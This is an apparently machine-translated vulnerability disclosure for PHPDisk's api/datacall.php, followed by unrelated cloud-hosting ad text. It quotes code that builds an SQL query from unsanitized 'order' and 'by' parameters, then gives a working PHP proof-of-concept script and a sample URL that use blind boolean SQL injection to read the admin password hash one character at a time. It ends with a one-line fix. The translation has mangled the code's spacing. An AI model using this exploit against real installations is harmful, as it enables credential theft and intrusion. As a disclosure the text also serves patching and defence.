In phpdisk/api/datacall. php has a piece of code: $ order = trim (gpc ('order', 'G', ''); $ by = trim (gpc ('by', 'G ', ''); $ limit = (int) gpc ('limit', 'G', 0); if (! $ Type |! $ Order |! $ By |! $ Limit) {echo 'phpdisk Datacall Parameter is null or Error! '; Exit;} $ filter_arr = array ('select', 'delete', 'update', 'insert'); for ($ I = 0; $ I <count ($ filter_arr); $ I ++) {if (strpos ($ order, strtolower ($ filter_arr [$ I])! = False) {die ('phpdisk Datacall Parameter Error! ') ;}} If ($ type = 'user') {echo' <ul> '. LF; $ q = $ db-> query ("select username, userid from {$ tpf} users order by $ order $ by limit $ limit "); $ order and $ by entered the query. The author thought that someone may submit the query in order, but he did not expect to submit the order, the same can be submitted in. Vulnerability proof: <? Php $ file =' http://localhost/phpdisk/api/datacall.php '; For ($ I = 0; $ I <32; $ I ++) {$ path = $ I + 1; foreach (array ('A',' B ', 'C', 'D', 'E', 'F',) as $ w) {$ api = $ file. '? Type = user & by = '. urlencode ('(if (select substring (password ,'. $ path. ', 1) from pd_users where userid = 1) = 0x '. bin2hex ($ w ). '), userid, username ))'). '& order =/**/& limit = 1'; if (strpos (file_get_contents ($ api), 'admin ')! = False) {echo $ w; break;} www.2cto.com }}// http://localhost/phpdisk/api/datacall.php ? Type = user & by = if % 28% 28% 28 select % 201% 20 from % 20pd_users % 20 where % 20 userid = 1% 20 limit % 201% 29 = 2% 29, userid, username % 29 & order =/**/& limit = 1?>Solution:Only order and by of a-z are allowed
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
